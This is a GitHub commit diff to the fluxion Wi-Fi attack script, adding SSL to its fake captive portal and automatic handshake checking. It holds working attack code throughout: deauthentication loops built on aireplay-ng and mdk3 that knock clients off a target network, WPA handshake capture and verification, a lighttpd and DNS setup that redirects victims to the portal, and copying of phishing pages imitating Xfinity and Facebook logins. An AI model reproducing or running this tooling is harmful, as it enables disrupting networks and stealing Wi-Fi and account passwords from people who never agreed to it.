Fix ssl once again / auto handshake check

- Add ssl support 
- auto handshake check
This commit is contained in:
deltax 2016-09-21 12:27:04 +02:00 committed by GitHub
parent d8f604397d
commit 80ba8db616
1 changed files with 63 additions and 56 deletions

119
fluxion
View File

@ -23,8 +23,8 @@ WORK_DIR=`pwd`
ipNmap=`ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p'`
# Deauth duration during handshake capture
# oo
DEAUTHTIME="9999999999999"
revision=53
DEAUTHTIME="15"
revision=54
version=0.23
IP=192.168.1.1
RANG_IP=$(echo $IP | cut -d "." -f 1,2,3)
@ -552,16 +552,16 @@ fi
if [ $FLUX_DEBUG != 1 ]; then
echo ""
sleep 0.1 && echo -e "$red "
sleep 0.1 && echo -e "$red "
sleep 0.1 && echo -e " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐ "
sleep 0.1 && echo -e " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║ "
sleep 0.1 && echo -e " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║ "
sleep 0.1 && echo -e " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜ "
sleep 0.1 && echo -e " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║ "
sleep 0.1 && echo -e " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║ "
sleep 0.1 && echo -e " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘ "
sleep 0.1 && echo -e " ¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ "
echo""
sleep 1
echo -e $red" FLUX "$white""$version" (rev. "$green "$revision"$white") "$yellow"by "$white" deltax"
sleep 1
@ -726,7 +726,7 @@ function language {
done
}
function german {
function german {
header_setinterface="Wähle deine Netzwerk Karte"
setinterface_error="Es wurden keine Netzwerk Karten gefunden, beende..."
@ -1006,7 +1006,7 @@ function spain {
}
function chinese {
setinterface_error="没有检测到网卡 退出..."
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
header_choosescan="选择信道"
@ -1188,7 +1188,7 @@ function Scan {
conditional_clear
rm -rf $DUMP_PATH/dump*
xterm $HOLD -title "$header_scan" $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump -a $WIFI_MONITOR --ignore-negative-one
xterm $HOLD -title "$header_scan" $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump -a $WIFI_MONITOR --ignore-negative-one
}
# Choose a network
@ -1402,7 +1402,7 @@ function askauth {
echo ""
case $yn in
1 ) authmode="handshake"; handshakelocation; break ;;
2 ) authmode="wpa_supplicant"; webinterface; break ;;
2 ) authmode="wpa_supplicant"; certssl; break ;;
3 ) askAP; break ;;
* ) echo "$general_case_error"; conditional_clear ;;
esac
@ -3213,7 +3213,7 @@ function handshakelocation {
if [[ "$Host_MAC_loc" == *"$Host_MAC"* ]] && [[ "$Host_SSID_loc" == *"$Host_SSID"* ]]; then
if pyrit -r $handshakeloc analyze 2>&1 | sed -n /$(echo $Host_MAC | tr '[:upper:]' '[:lower:]')/,/^#/p | grep -vi "AccessPoint" | grep -qi "good,"; then
cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap
webinterface
certssl
else
echo "Corrupted handshake"
echo
@ -3229,7 +3229,7 @@ function handshakelocation {
else
if aircrack-ng $handshakeloc | grep -q "1 handshake"; then
cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap
webinterface
certssl
else
echo "Corrupted handshake"
sleep 4
@ -3375,33 +3375,21 @@ function deauth {
function deauthMENU {
while true; do
conditional_clear
clear
top
echo "$header_deauthMENU "
echo "$header_deauthMENU / automatic Handshake check "
echo
echo -e "Status handshake: $Handshake_statuscheck"
echo
echo -e " "$blue"1)"$transparent" $deauthMENU_option_1"
echo -e " "$blue"2)"$transparent" $general_back (Select another deauth method)"
echo -e " "$blue"3)"$transparent" Select another network"
echo -e " "$blue"4)"$transparent" Exit"
echo -n ' #> '
read yn
echo -e " "$grey"1)"$transparent" $deauthMENU_option_1"
echo -e " "$grey"2)"$transparent" $general_back (Select another deauth method)"
echo -e " "$grey"3)"$transparent" Select another network"
echo -e " "$grey"4)"$transparent" Exit"
case $yn in
1 ) checkhandshake;;
2 ) conditional_clear; askclientsel; break;;
3 ) killall airodump-ng mdk3 aireplay-ng &>$flux_output_device; CSVDB=dump-01.csv; breakmode=1; selection; break ;;
4 ) exitmode; break;;
* ) echo "
$general_case_error"; conditional_clear ;;
esac
done
}
# Capture all
@ -3422,8 +3410,9 @@ function checkhandshake {
if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then
killall airodump-ng mdk3 aireplay-ng &>$flux_output_device
wpaclean $HANDSHAKE_PATH/$Host_SSID-$Host_MAC.cap $DUMP_PATH/$Host_MAC-01.cap &>$flux_output_device
webinterface
certssl
i=2
y=2
break
else
@ -3436,8 +3425,9 @@ function checkhandshake {
if pyrit -r $DUMP_PATH/test.cap analyze 2>&1 | grep -q "good,"; then
killall airodump-ng mdk3 aireplay-ng &>$flux_output_device
pyrit -r $DUMP_PATH/test.cap -o $HANDSHAKE_PATH/$Host_SSID-$Host_MAC.cap strip &>$flux_output_device
webinterface
certssl
i=2
y=2
break
else
@ -3472,7 +3462,7 @@ function certssl {
echo " Certificate invalid or not present, please choice"
echo " "
echo -e " "$blue"1)"$transparent" Create a SSL certificate"
echo -e " "$blue"2)"$transparent" Search for SSl certificate" # hop to certssl check again
echo -e " "$blue"2)"$transparent" Search for SSl certificate" # hop to certssl check again
echo -e " "$blue"3)"$red" Exit" $transparent
echo " "
echo -n ' #> '
@ -3493,23 +3483,23 @@ function certssl {
echo " Certificate invalid or not present, please choice"
echo " "
echo -e " "$blue"1)"$transparent" Create a SSL certificate"
echo -e " "$blue"2)"$transparent" Search for SSl certificate" # hop to certssl check again
echo -e " "$blue"2)"$transparent" Search for SSl certificate" # hop to certssl check again
echo -e " "$blue"3)"$red" Exit" $transparent
echo " "
echo -n ' #> '
read yn
case $yn in
1 ) creassl;;
2 ) certssl; break;;
3 ) exitmode; break;;
* ) echo "$general_case_error"; conditional_clear
esac
done
fi
}
@ -3689,7 +3679,7 @@ function webinterface {
NEUTRA
break
elif [ "$fluxass" = "16" ]; then
DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ZH
DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ZH
@ -3702,7 +3692,7 @@ function webinterface {
NEUTRA
break
elif [ "$fluxass" = "17" ]; then
continue
fi
@ -3844,22 +3834,26 @@ mimetype.assign = (
\".css\" => \"text/css\"
)
server.error-handler-404 = \"/\"
static-file.exclude-extensions = ( \".fcgi\", \".php\", \".rb\", \"~\", \".inc\" )
index-file.names = ( \"index.htm\" )
\$SERVER[\"socket\"] == \":443\" {
url.redirect = ( \"^/(.*)\" => \"192.168.1.1\")
ssl.engine = \"enable\"
ssl.pemfile = \"/root/server.pem\"
}
#Redirect www.domain.com to domain.com
\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
ssl.engine = \"enable\"
ssl.pemfile = \"/root/server.pem\"
}
" >$DUMP_PATH/lighttpd.conf
# that redirects all DNS requests to the gateway
echo "import socket
@ -4185,25 +4179,38 @@ function handshakecheck {
############################################## < STUFF > ############################################
y=1
# Deauth all
function deauthall {
while true; do
deauthMENU
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
sleep 15
checkhandshake
done
}
function deauthmdk3 {
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
function deauthmdk3 {
while true; do
deauthMENU
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
mdk3PID=$!
sleep 15
checkhandshake
done
}
# Deauth to a specific target
function deauthesp {
while true;do
deauthMENU
sleep 2
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating client $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
sleep 15
checkhandshake
done
}
# Close all processes
@ -7230,17 +7237,17 @@ mkdir $DUMP_PATH/data &>$flux_output_device
cp $WORK_DIR/Sites/Login-Xfinity/Xfinity.html $DUMP_PATH/data
}
function topusers {
echo -e " "
function topusers {
echo -e " "
echo -e " _ _ _ "
echo -e " / \ __ _ _// _/ "
echo -e " / /\ | /| )_ ___ \ "
echo -e " / | \ | | / \ "
echo -e " __| /| /__ /___ / "
echo -e " / / / / "
echo -e " / /\ | /| )_ ___ \ "
echo -e " / | \ | | / \ "
echo -e " __| /| /__ /___ / "
echo -e " / / / / "
echo -e " "
}
# Create a Facebook login page
# Create a Facebook login page
function Facebook {
mkdir $DUMP_PATH/data &>$ares_output_device
cp $WORK_DIR/Sites/Facebook/config.ini $DUMP_PATH/data